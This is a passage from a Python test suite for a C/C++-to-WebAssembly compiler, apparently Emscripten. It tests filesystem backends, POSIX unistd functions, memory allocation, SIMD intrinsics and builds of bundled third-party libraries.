self.do_core_test('test_wprintf.cpp')
def test_write_stdout_fileno(self):
self.do_core_test('test_write_stdout_fileno.c')
self.do_core_test('test_write_stdout_fileno.c', args=['-sFILESYSTEM=0'])
@also_with_wasmfs # tests EXIT_RUNTIME flushing
def test_direct_string_constant_usage(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_direct_string_constant_usage.cpp')
def test_std_cout_new(self):
self.do_core_test('test_std_cout_new.cpp')
def test_std_function_incomplete_return(self):
self.do_core_test('test_std_function_incomplete_return.cpp')
def test_istream(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
for linkable in [0]: # , 1]:
print(linkable)
# regression check for issue #273
self.set_setting('LINKABLE', linkable)
self.do_core_test('test_istream.cpp')
def test_fs_base(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$FS'])
self.uses_es6 = True
self.add_pre_run(read_file(test_file('filesystem/src.js')))
src = 'int main() {return 0;}\n'
expected = read_file(test_file('filesystem/output.txt'))
self.do_run(src, expected)
@also_with_noderawfs
@is_slow_test
def test_fs_nodefs_rw(self):
# TODO(sbc): This test exposes an issue in the way we run closure compiler and
# causes it to generate non-ES5 output.
# Remove this line once we fix: https://github.com/emscripten-core/emscripten/issues/12628
self.uses_es6 = True
self.emcc_args += ['-lnodefs.js']
self.set_setting('SYSCALL_DEBUG')
self.do_runf(test_file('fs/test_nodefs_rw.c'), 'success')
if self.maybe_closure():
self.do_runf(test_file('fs/test_nodefs_rw.c'), 'success')
@also_with_noderawfs
def test_fs_nodefs_cloexec(self):
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_cloexec.c'), 'success')
def test_fs_nodefs_home(self):
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_home.c'), 'success', js_engines=[config.NODE_JS])
def test_fs_nodefs_nofollow(self):
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_nofollow.c'), 'success', js_engines=[config.NODE_JS])
def test_fs_nodefs_readdir(self):
# externally setup an existing folder structure: existing/a
os.makedirs(os.path.join(self.working_dir, 'existing', 'a'))
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_readdir.c'), 'success')
@no_windows('no symlink support on windows')
def test_fs_noderawfs_nofollow(self):
self.set_setting('NODERAWFS')
create_file('filename', 'foo')
os.symlink('filename', 'linkname')
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_noderawfs_nofollow.c'), 'success', js_engines=[config.NODE_JS])
def test_fs_trackingdelegate(self):
self.set_setting('FS_DEBUG')
self.do_run_in_out_file_test('fs/test_trackingdelegate.c')
@also_with_noderawfs
def test_fs_writeFile(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING') # see issue 2334
self.do_run_in_out_file_test('fs/test_writeFile.cpp')
def test_fs_write(self):
self.do_run_in_out_file_test('fs/test_write.cpp')
@also_with_noderawfs
def test_fs_emptyPath(self):
self.do_run_in_out_file_test('fs/test_emptyPath.c')
@also_with_noderawfs
def test_fs_append(self):
self.do_runf(test_file('fs/test_append.c'), 'success')
def test_fs_mmap(self):
self.uses_es6 = True
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS', 'NODERAWFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
if fs == 'NODERAWFS':
self.emcc_args += ['-lnodefs.js', '-lnoderawfs.js']
self.do_run_in_out_file_test('fs/test_mmap.c')
@parameterized({
'': [],
'minimal_runtime': ['-sMINIMAL_RUNTIME=1']
})
def test_fs_no_main(self, *args):
# library_fs.js uses hooks to enable ignoring of permissions up until ATMAIN callbacks are run.
# This test verifies that they work correctly, even in programs without a main function.
create_file('pre.js', '''
Module['preRun'] = function() {
assert(FS.ignorePermissions, "ignorePermissions not set during preRun");
}
Module['onRuntimeInitialized'] = function() {
assert(!FS.ignorePermissions, "ignorePermissions not unset during onRuntimeInitialized");
assert(_foo() == 42);
}
''')
self.set_setting('EXPORTED_FUNCTIONS', '_foo')
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args += ['--pre-js', 'pre.js'] + list(args)
self.do_run('int foo() { return 42; }', '', force_c=True)
@also_with_noderawfs
def test_fs_errorstack(self):
# Enables strict mode, which may catch some strict-mode-only errors
# so that users can safely work with strict JavaScript if enabled.
create_file('pre.js', '"use strict";')
self.emcc_args += ['--pre-js', 'pre.js']
self.set_setting('FORCE_FILESYSTEM')
self.set_setting('ASSERTIONS')
self.do_run(r'''
#include <emscripten.h>
#include <iostream>
int main(void) {
std::cout << "hello world\n"; // should work with strict mode
EM_ASM(
try {
FS.readFile('/dummy.txt');
} catch (err) {
err.stack = err.stack; // should be writable
throw err;
}
);
return 0;
}
''', 'at Object.readFile', assert_returncode=NON_ZERO) # engines has different error stack format
@also_with_noderawfs
def test_fs_llseek(self):
self.set_setting('FORCE_FILESYSTEM')
self.do_runf(test_file('fs/test_llseek.c'), 'success')
def test_fs_64bit(self):
self.do_runf(test_file('fs/test_64bit.c'), 'success')
def test_sigalrm(self):
self.do_runf(test_file('test_sigalrm.c'), 'Received alarm!')
self.set_setting('EXIT_RUNTIME')
self.do_runf(test_file('test_sigalrm.c'), 'Received alarm!')
def test_signals(self):
self.do_core_test(test_file('test_signals.c'))
@no_windows('https://github.com/emscripten-core/emscripten/issues/8882')
def test_unistd_access(self):
self.uses_es6 = True
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if self.get_setting('WASMFS'):
if fs == 'NODEFS':
# TODO: NODEFS in WasmFS
continue
self.emcc_args += ['-sFORCE_FILESYSTEM']
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/access.c', js_engines=[config.NODE_JS])
# Node.js fs.chmod is nearly a no-op on Windows
# TODO: NODERAWFS in WasmFS
if not WINDOWS and not self.get_setting('WASMFS'):
self.emcc_args = orig_compiler_opts
self.set_setting('NODERAWFS')
self.do_run_in_out_file_test('unistd/access.c', js_engines=[config.NODE_JS])
def test_unistd_curdir(self):
self.uses_es6 = True
self.do_run_in_out_file_test('unistd/curdir.c')
@also_with_noderawfs
def test_unistd_close(self):
self.do_run_in_out_file_test('unistd/close.c')
@also_with_noderawfs
def test_unistd_pipe(self):
self.do_runf(test_file('unistd/pipe.c'), 'success')
@also_with_noderawfs
def test_unistd_dup(self):
self.do_run_in_out_file_test('unistd/dup.c')
def test_unistd_truncate(self):
self.uses_es6 = True
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if self.get_setting('WASMFS'):
if fs == 'NODEFS':
# TODO: NODEFS in WasmFS
continue
self.emcc_args += ['-sFORCE_FILESYSTEM']
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/truncate.c', js_engines=[config.NODE_JS])
@no_windows("Windows throws EPERM rather than EACCES or EINVAL")
@unittest.skipIf(WINDOWS or os.geteuid() == 0, "Root access invalidates this test by being able to write on readonly files")
def test_unistd_truncate_noderawfs(self):
self.uses_es6 = True
self.set_setting('NODERAWFS')
self.maybe_closure()
self.do_run_in_out_file_test('unistd/truncate.c', js_engines=[config.NODE_JS])
@also_with_standalone_wasm()
def test_unistd_sysconf(self):
self.do_run_in_out_file_test('unistd/sysconf.c')
@no_asan('ASan alters memory layout')
def test_unistd_sysconf_phys_pages(self):
filename = test_file('unistd/sysconf_phys_pages.c')
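# With memory growth enabled the test expects a 2GB range; otherwise it expects
# the default 16MB initial memory (both reported in wasm pages).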
if self.get_setting('ALLOW_MEMORY_GROWTH'):
expected = (2 * 1024 * 1024 * 1024) // webassembly.WASM_PAGE_SIZE
else:
expected = 16 * 1024 * 1024 // webassembly.WASM_PAGE_SIZE
self.do_runf(filename, str(expected) + ', errno: 0')
@no_windows('https://github.com/emscripten-core/emscripten/issues/8882')
def test_unistd_unlink(self):
self.clear()
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
if fs == 'NODEFS' and self.get_setting('WASMFS'):
# TODO: NODEFS in WasmFS
continue
self.emcc_args = orig_compiler_opts + ['-D' + fs]
# symlinks on node.js on non-linux behave differently (e.g. on Windows they require administrative privileges)
# so skip testing those bits on that combination.
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
if WINDOWS:
self.emcc_args += ['-DNO_SYMLINK=1']
if MACOS:
continue
self.do_runf(test_file('unistd/unlink.c'), 'success', js_engines=[config.NODE_JS])
# Several differences/bugs on non-linux including https://github.com/nodejs/node/issues/18014
# TODO: NODERAWFS in WasmFS
if not WINDOWS and not MACOS and not self.get_setting('WASMFS'):
self.emcc_args = orig_compiler_opts + ['-DNODERAWFS']
# 0 if root user
if os.geteuid() == 0:
self.emcc_args += ['-DSKIP_ACCESS_TESTS']
self.set_setting('NODERAWFS')
self.do_runf(test_file('unistd/unlink.c'), 'success', js_engines=[config.NODE_JS])
@parameterized({
'memfs': (['-DMEMFS'], False),
'nodefs': (['-DNODEFS', '-lnodefs.js'], True)
})
def test_unistd_links(self, args, nodefs):
self.emcc_args += args
if WINDOWS and nodefs:
self.skipTest('Skipping NODEFS part of this test for test_unistd_links on Windows, since it would require administrative privileges.')
# Also, other detected discrepancies if you do end up running this test on NODEFS:
# test expects /, but Windows gives \ as path slashes.
# Calling readlink() on a non-link gives error 22 EINVAL on Unix, but simply error 0 OK on Windows.
if self.get_setting('WASMFS'):
if nodefs:
self.skipTest('TODO: wasmfs+node')
self.emcc_args += ['-sFORCE_FILESYSTEM']
self.do_run_in_out_file_test('unistd/links.c', js_engines=[config.NODE_JS])
@no_windows('Skipping NODEFS test, since it would require administrative privileges.')
def test_unistd_symlink_on_nodefs(self):
# Also, other detected discrepancies if you do end up running this test on NODEFS:
# test expects /, but Windows gives \ as path slashes.
# Calling readlink() on a non-link gives error 22 EINVAL on Unix, but simply error 0 OK on Windows.
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/symlink_on_nodefs.c', js_engines=[config.NODE_JS])
@also_with_wasm_bigint
def test_unistd_io(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$ERRNO_CODES'])
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.clear()
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/io.c')
@no_windows('https://github.com/emscripten-core/emscripten/issues/8882')
def test_unistd_misc(self):
self.set_setting('LLD_REPORT_UNDEFINED')
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_run_in_out_file_test('unistd/misc.c', js_engines=[config.NODE_JS], interleaved_output=False)
# The API uses i64s, which we'd need to legalize for JS, so in standalone
# mode all we can test is wasm VMs.
@also_with_standalone_wasm(wasm2c=True)
def test_posixtime(self):
self.banned_js_engines = [config.V8_ENGINE] # v8 lacks monotonic time
self.do_core_test('test_posixtime.c')
def test_uname(self):
self.do_core_test('test_uname.c')
def test_unary_literal(self):
self.do_core_test('test_unary_literal.cpp')
def test_env(self):
expected = read_file(test_file('env/output.txt'))
self.do_runf(test_file('env/src.c'), [
expected.replace('{{{ THIS_PROGRAM }}}', self.in_dir('src.js')).replace('\\', '/'), # node, can find itself properly
expected.replace('{{{ THIS_PROGRAM }}}', './this.program') # spidermonkey, v8
])
def test_environ(self):
expected = read_file(test_file('env/output-mini.txt'))
self.do_runf(test_file('env/src-mini.c'), [
expected.replace('{{{ THIS_PROGRAM }}}', self.in_dir('src-mini.js')).replace('\\', '/'), # node, can find itself properly
expected.replace('{{{ THIS_PROGRAM }}}', './this.program') # spidermonkey, v8
])
def test_systypes(self):
self.do_core_test('test_systypes.c')
def test_stddef(self):
self.do_core_test('test_stddef.cpp')
self.do_core_test('test_stddef.cpp', force_c=True)
def test_getloadavg(self):
self.do_core_test('test_getloadavg.c')
def test_nl_types(self):
self.do_core_test('test_nl_types.c')
def test_799(self):
src = test_file('799.cpp')
self.do_runf(src, '''Set PORT family: 0, port: 3979
Get PORT family: 0
PORT: 3979
''')
def test_ctype(self):
self.do_core_test('test_ctype.c')
def test_strcasecmp(self):
self.do_core_test('test_strcasecmp.c')
def test_atomic(self):
self.do_core_test('test_atomic.c')
def test_atomic_cxx(self):
# the wasm backend has lock-free atomics, but not asm.js or asm2wasm
self.emcc_args += ['-DIS_64BIT_LOCK_FREE=1']
self.do_core_test('test_atomic_cxx.cpp')
# TODO: test with USE_PTHREADS in wasm backend as well
def test_phiundef(self):
self.do_core_test('test_phiundef.c')
def test_netinet_in(self):
self.do_run_in_out_file_test('netinet/in.cpp')
@needs_dylink
def test_main_module_static_align(self):
if self.get_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('no shared modules with memory growth')
self.set_setting('MAIN_MODULE')
self.do_core_test('test_main_module_static_align.cpp')
# libc++ tests
def test_iostream_and_determinism(self):
create_file('src.cpp', '''
#include <iostream>
int main()
{
std::cout << "hello world" << std::endl << 77 << "." << std::endl;
return 0;
}
''')
num = 5
for i in range(num):
print('(iteration %d)' % i)
# add some timing nondeterminism here, not that we need it, but whatever
time.sleep(random.random() / (10 * num))
self.do_runf('src.cpp', 'hello world\n77.\n')
# Verify that this build is identical to the previous one
if os.path.exists('src.js.previous'):
self.assertBinaryEqual('src.js', 'src.js.previous')
shutil.copy2('src.js', 'src.js.previous')
# Same but for the wasm file.
if self.is_wasm() and not self.get_setting('WASM2JS'):
if os.path.exists('src.wasm.previous'):
self.assertBinaryEqual('src.wasm', 'src.wasm.previous')
shutil.copy2('src.wasm', 'src.wasm.previous')
def test_stdvec(self):
self.do_core_test('test_stdvec.cpp')
def test_random_device(self):
self.maybe_closure()
self.do_core_test('test_random_device.cpp')
def test_reinterpreted_ptrs(self):
self.do_core_test('test_reinterpreted_ptrs.cpp')
def test_js_libraries(self):
create_file('main.cpp', '''
#include <stdio.h>
extern "C" {
extern void printey();
extern int calcey(int x, int y);
}
int main() {
printey();
printf("*%d*\\n", calcey(10, 22));
return 0;
}
''')
create_file('mylib1.js', '''
mergeInto(LibraryManager.library, {
printey: function() {
out('hello from lib!');
}
});
''')
create_file('mylib2.js', '''
mergeInto(LibraryManager.library, {
calcey: function(x, y) {
return x + y;
}
});
''')
self.emcc_args += ['--js-library', 'mylib1.js', '--js-library', 'mylib2.js']
self.do_runf('main.cpp', 'hello from lib!\n*32*\n')
def test_unicode_js_library(self):
create_file('main.cpp', '''
#include <stdio.h>
extern "C" {
extern void printey();
}
int main() {
printey();
return 0;
}
''')
self.emcc_args += ['--js-library', test_file('unicode_library.js')]
self.do_runf('main.cpp', u'Unicode snowman \u2603 says hello!')
def test_funcptr_import_type(self):
self.emcc_args += ['--js-library', test_file('core/test_funcptr_import_type.js')]
self.do_core_test('test_funcptr_import_type.cpp')
@no_asan('ASan does not work with EXPORT_ALL')
def test_constglobalunion(self):
self.set_setting('EXPORT_ALL')
self.do_run(r'''
#include <stdio.h>
struct one_const {
long a;
};
struct two_consts {
long a;
long b;
};
union some_consts {
struct one_const one;
struct two_consts two;
};
union some_consts my_consts = {{
1
}};
struct one_const addr_of_my_consts = {
(long)(&my_consts)
};
int main(void) {
printf("%li\n", (long)!!addr_of_my_consts.a);
return 0;
}
''', '1')
### 'Medium' tests
def test_fannkuch(self):
results = [(1, 0), (2, 1), (3, 2), (4, 4), (5, 7), (6, 10), (7, 16), (8, 22)]
self.build(test_file('fannkuch.cpp'))
for i, j in results:
print(i, j)
self.do_run('fannkuch.js', 'Pfannkuchen(%d) = %d.' % (i, j), args=[str(i)], no_build=True)
def test_raytrace(self):
# TODO: Should we remove this test?
self.skipTest('Relies on double value rounding, extremely sensitive')
src = read_file(test_file('raytrace.cpp')).replace('double', 'float')
output = read_file(test_file('raytrace.ppm'))
self.do_run(src, output, args=['3', '16'])
def test_fasta(self):
results = [(1, '''GG*ctt**tgagc*'''),
(20, '''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tacgtgtagcctagtgtttgtgttgcgttatagtctatttgtggacacagtatggtcaaa**tgacgtcttttgatctgacggcgttaacaaagatactctg*'''),
(50, '''GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTTGGGAGGCCGAGGCGGGCGGA*TCACCTGAGGTCAGGAGTTCGAGACCAGCCTGGCCAACAT*cttBtatcatatgctaKggNcataaaSatgtaaaDcDRtBggDtctttataattcBgtcg**tactDtDagcctatttSVHtHttKtgtHMaSattgWaHKHttttagacatWatgtRgaaa**NtactMcSMtYtcMgRtacttctWBacgaa**agatactctgggcaacacacatacttctctcatgttgtttcttcggacctttcataacct**ttcctggcacatggttagctgcacatcacaggattgtaagggtctagtggttcagtgagc**ggaatatcattcgtcggtggtgttaatctatctcggtgtagcttataaatgcatccgtaa**gaatattatgtttatttgtcggtacgttcatggtagtggtgtcgccgatttagacgtaaa**ggcatgtatg*''')]
old = self.emcc_args
orig_src = read_file(test_file('fasta.cpp'))
def test(extra_args):
self.emcc_args = old + extra_args
for t in ['float', 'double']:
print(t)
src = orig_src.replace('double', t)
with open('fasta.cpp', 'w') as f:
f.write(src)
self.build('fasta.cpp')
for arg, output in results:
self.do_run('fasta.js', output, args=[str(arg)], output_nicerizer=lambda x: x.replace('\n', '*'), no_build=True)
shutil.copyfile('fasta.js', '%s.js' % t)
test([])
@needs_non_trapping_float_to_int
def test_fasta_nontrapping(self):
self.emcc_args += ['-mnontrapping-fptoint']
self.test_fasta()
def test_whets(self):
self.do_runf(test_file('whets.cpp'), 'Single Precision C Whetstone Benchmark')
# node is slower, and fails on 64-bit
@require_v8
@no_asan('depends on the specifics of memory size, which for asan we are forced to increase')
@no_lsan('depends on the specifics of memory size, which for lsan we are forced to increase')
def test_dlmalloc_inline(self):
# needed with typed arrays
self.set_setting('INITIAL_MEMORY', '128mb')
src = read_file(path_from_root('system/lib/dlmalloc.c')) + '\n\n\n' + read_file(test_file('dlmalloc_test.c'))
self.do_run(src, '*1,0*', args=['200', '1'], force_c=True)
self.do_run('src.js', '*400,0*', args=['400', '400'], force_c=True, no_build=True)
# node is slower, and fails on 64-bit
@require_v8
@no_asan('depends on the specifics of memory size, which for asan we are forced to increase')
@no_lsan('depends on the specifics of memory size, which for lsan we are forced to increase')
@no_wasmfs('wasmfs does some malloc/free during startup, fragmenting the heap, leading to differences later')
def test_dlmalloc(self):
# needed with typed arrays
self.set_setting('INITIAL_MEMORY', '128mb')
# Linked version
self.do_runf(test_file('dlmalloc_test.c'), '*1,0*', args=['200', '1'])
self.do_run('dlmalloc_test.js', '*400,0*', args=['400', '400'], no_build=True)
# TODO: do this in other passes too, passing their opts into emcc
if self.emcc_args == []:
# emcc should build in dlmalloc automatically, and do all the sign correction etc. for it
try_delete('src.js')
self.run_process([EMCC, test_file('dlmalloc_test.c'), '-sINITIAL_MEMORY=128MB', '-o', 'src.js'], stdout=PIPE, stderr=self.stderr_redirect)
self.do_run(None, '*1,0*', ['200', '1'], no_build=True)
self.do_run(None, '*400,0*', ['400', '400'], no_build=True)
# The same for new and all its variants
src = read_file(test_file('new.cpp'))
for new, delete in [
('malloc(100)', 'free'),
('new char[100]', 'delete[]'),
('new Structy', 'delete'),
('new int', 'delete'),
('new Structy[10]', 'delete[]'),
]:
self.do_run(src.replace('{{{ NEW }}}', new).replace('{{{ DELETE }}}', delete), '*1,0*')
# Tests that a large allocation should gracefully fail
@no_asan('the memory size limit here is too small for asan')
@no_lsan('the memory size limit here is too small for lsan')
def test_dlmalloc_large(self):
self.emcc_args += ['-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=128MB']
self.do_runf(test_file('dlmalloc_test_large.c'), '0 0 0 1')
@no_asan('asan also changes malloc, and that ends up linking in new twice')
@no_lsan('lsan also changes malloc, and that ends up linking in new twice')
def test_dlmalloc_partial(self):
# present part of the symbols of dlmalloc, not all
src = read_file(test_file('new.cpp')).replace('{{{ NEW }}}', 'new int').replace('{{{ DELETE }}}', 'delete') + '''
#include <emscripten/console.h>
#include <new>
void* operator new(size_t size) {
emscripten_console_log("new!");
return malloc(size);
}
'''
self.do_run(src, 'new!\n*1,0*')
@no_asan('asan also changes malloc, and that ends up linking in new twice')
@no_lsan('lsan also changes malloc, and that ends up linking in new twice')
def test_dlmalloc_partial_2(self):
if 'SAFE_HEAP' in str(self.emcc_args):
self.skipTest('we do unsafe stuff here')
# present part of the symbols of dlmalloc, not all. malloc is harder to link than new which is weak.
self.do_core_test('test_dlmalloc_partial_2.c', assert_returncode=NON_ZERO)
def test_libcxx(self):
self.do_runf(test_file('hashtest.cpp'),
'june -> 30\nPrevious (in alphabetical order) is july\nNext (in alphabetical order) is march')
self.do_run('''
#include <set>
#include <stdio.h>
int main() {
std::set<int> fetchOriginatorNums;
fetchOriginatorNums.insert(171);
printf("hello world\\n");
return 0;
}
''', 'hello world')
def test_typeid(self):
self.do_core_test('test_typeid.cpp')
def test_static_variable(self):
# needs atexit
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_static_variable.cpp')
def test_fakestat(self):
self.do_core_test('test_fakestat.c')
@also_with_standalone_wasm()
def test_mmap(self):
# ASan needs more memory, but that is set up separately
if '-fsanitize=address' not in self.emcc_args:
self.set_setting('INITIAL_MEMORY', '128mb')
self.do_core_test('test_mmap.c')
def test_mmap_file(self):
for extra_args in [[]]:
self.emcc_args += ['--embed-file', 'data.dat'] + extra_args
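# Build an exactly 9000-byte payload so the mapped file spans multiple 4096-byte
# pages; the expected output below reads 20 bytes at offsets 0 and 4096.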
x = 'data from the file........'
s = ''
while len(s) < 9000:
if len(s) + len(x) < 9000:
s += x
continue
s += '.'
assert len(s) == 9000
create_file('data.dat', s)
self.do_runf(test_file('mmap_file.c'), '*\n' + s[0:20] + '\n' + s[4096:4096 + 20] + '\n*\n')
@no_lsan('Test code contains memory leaks')
def test_cubescript(self):
# uses register keyword
self.emcc_args += ['-std=c++03', '-Wno-dynamic-class-memaccess']
self.maybe_closure()
self.emcc_args += ['-I', test_file('third_party/cubescript')]
# Test code contains memory leaks
if '-fsanitize=address' in self.emcc_args:
self.emcc_args += ['--pre-js', test_file('asan-no-leak.js')]
def test():
src = test_file('third_party/cubescript/command.cpp')
self.do_runf(src, '*\nTemp is 33\n9\n5\nhello, everyone\n*')
test()
print('asyncify') # extra coverage
self.set_setting('ASYNCIFY')
test()
@needs_dylink
def test_relocatable_void_function(self):
self.set_setting('RELOCATABLE')
self.do_core_test('test_relocatable_void_function.c')
@wasm_simd
def test_wasm_intrinsics_simd(self):
def run():
self.do_runf(test_file('test_wasm_intrinsics_simd.c'), 'Success!')
# Improves test readability
self.emcc_args.append('-Wno-c++11-narrowing')
self.emcc_args.extend(['-Wpedantic', '-Werror', '-Wall', '-xc++'])
run()
self.emcc_args.append('-funsigned-char')
run()
# Tests invoking the NEON SIMD API via arm_neon.h header
@wasm_simd
def test_neon_wasm_simd(self):
self.emcc_args.append('-Wno-c++11-narrowing')
self.emcc_args.append('-mfpu=neon')
self.emcc_args.append('-msimd128')
self.do_runf(test_file('neon/test_neon_wasm_simd.cpp'), 'Success!')
# Tests invoking the SIMD API via x86 SSE1 xmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@no_safe_heap('has unaligned 64-bit operations in wasm')
def test_sse1(self):
src = test_file('sse/test_sse1.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse', '-o', 'test_sse1', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse1', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE2 emmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@no_safe_heap('has unaligned 64-bit operations in wasm')
@is_slow_test
def test_sse2(self):
src = test_file('sse/test_sse2.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse2', '-Wno-argument-outside-range', '-o', 'test_sse2', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse2', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse2', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE3 pmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
def test_sse3(self):
src = test_file('sse/test_sse3.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse3', '-Wno-argument-outside-range', '-o', 'test_sse3', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse3', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse3', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSSE3 tmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
def test_ssse3(self):
src = test_file('sse/test_ssse3.cpp')
self.run_process([shared.CLANG_CXX, src, '-mssse3', '-Wno-argument-outside-range', '-o', 'test_ssse3', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_ssse3', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-mssse3', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE4.1 smmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@is_slow_test
def test_sse4_1(self):
src = test_file('sse/test_sse4_1.cpp')
if not self.is_optimizing() and '-fsanitize=address' in self.emcc_args:
# ASan with -O0 fails with:
# Compiling function #69:"__original_main" failed: local count too large
self.emcc_args.append('-O1')
self.run_process([shared.CLANG_CXX, src, '-msse4.1', '-Wno-argument-outside-range', '-o', 'test_sse4_1', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse4_1', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse4.1', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 SSE4.2 nmmintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
def test_sse4_2(self):
src = test_file('sse/test_sse4_2.cpp')
self.run_process([shared.CLANG_CXX, src, '-msse4.2', '-Wno-argument-outside-range', '-o', 'test_sse4_2', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_sse4_2', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-msse4.2', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
# Tests invoking the SIMD API via x86 AVX avxintrin.h header (_mm_x() functions)
@wasm_simd
@requires_native_clang
@is_slow_test
@no_asan('local count too large')
def test_avx(self):
src = test_file('sse/test_avx.cpp')
self.run_process([shared.CLANG_CXX, src, '-mavx', '-Wno-argument-outside-range', '-o', 'test_avx', '-D_CRT_SECURE_NO_WARNINGS=1'] + clang_native.get_clang_native_args(), stdout=PIPE)
native_result = self.run_process('./test_avx', stdout=PIPE).stdout
self.emcc_args += ['-I' + test_file('sse'), '-mavx', '-Wno-argument-outside-range']
self.maybe_closure()
self.do_runf(src, native_result)
@wasm_simd
def test_sse_diagnostics(self):
self.emcc_args.remove('-Werror')
src = test_file('sse/test_sse_diagnostic.cpp')
p = self.run_process(
[shared.EMXX, src, '-msse', '-DWASM_SIMD_COMPAT_SLOW'] + self.get_emcc_args(),
stderr=PIPE)
self.assertContained('Instruction emulated via slow path.', p.stderr)
@requires_native_clang
@wasm_relaxed_simd
def test_relaxed_simd_implies_simd128(self):
src = test_file('sse/test_sse1.cpp')
self.build(src, emcc_args=['-msse'])
@no_asan('call stack exceeded on some versions of node')
def test_gcc_unmangler(self):
self.emcc_args += ['-I' + test_file('third_party/libiberty')]
self.do_runf(test_file('third_party/libiberty/cp-demangle.c'), '*d_demangle(char const*, int, unsigned int*)*', args=['_ZL10d_demanglePKciPj'])
@needs_make('make')
def test_lua(self):
self.emcc_args.remove('-Werror')
libs = self.get_library('third_party/lua', [Path('src/lua.o'), Path('src/liblua.a')], make=['make', 'generic'], configure=None)
self.do_run('',
'hello lua world!\n17\n1\n2\n3\n4\n7',
args=['-e', '''print("hello lua world!");print(17);for x = 1,4 do print(x) end;print(10-3)'''],
libraries=libs,
includes=[test_file('lua')],
output_nicerizer=lambda output: output.replace('\n\n', '\n').replace('\n\n', '\n'))
@no_asan('issues with freetype itself')
@needs_make('configure script')
@is_slow_test
def test_freetype(self):
self.add_pre_run("FS.createDataFile('/', 'font.ttf', %s, true, false, false);" % str(
list(bytearray(read_binary(test_file('freetype/LiberationSansBold.ttf'))))
))
# Not needed for js, but useful for debugging
shutil.copyfile(test_file('freetype/LiberationSansBold.ttf'), 'font.ttf')
# Main
self.do_run_from_file(test_file('freetype/main.c'),
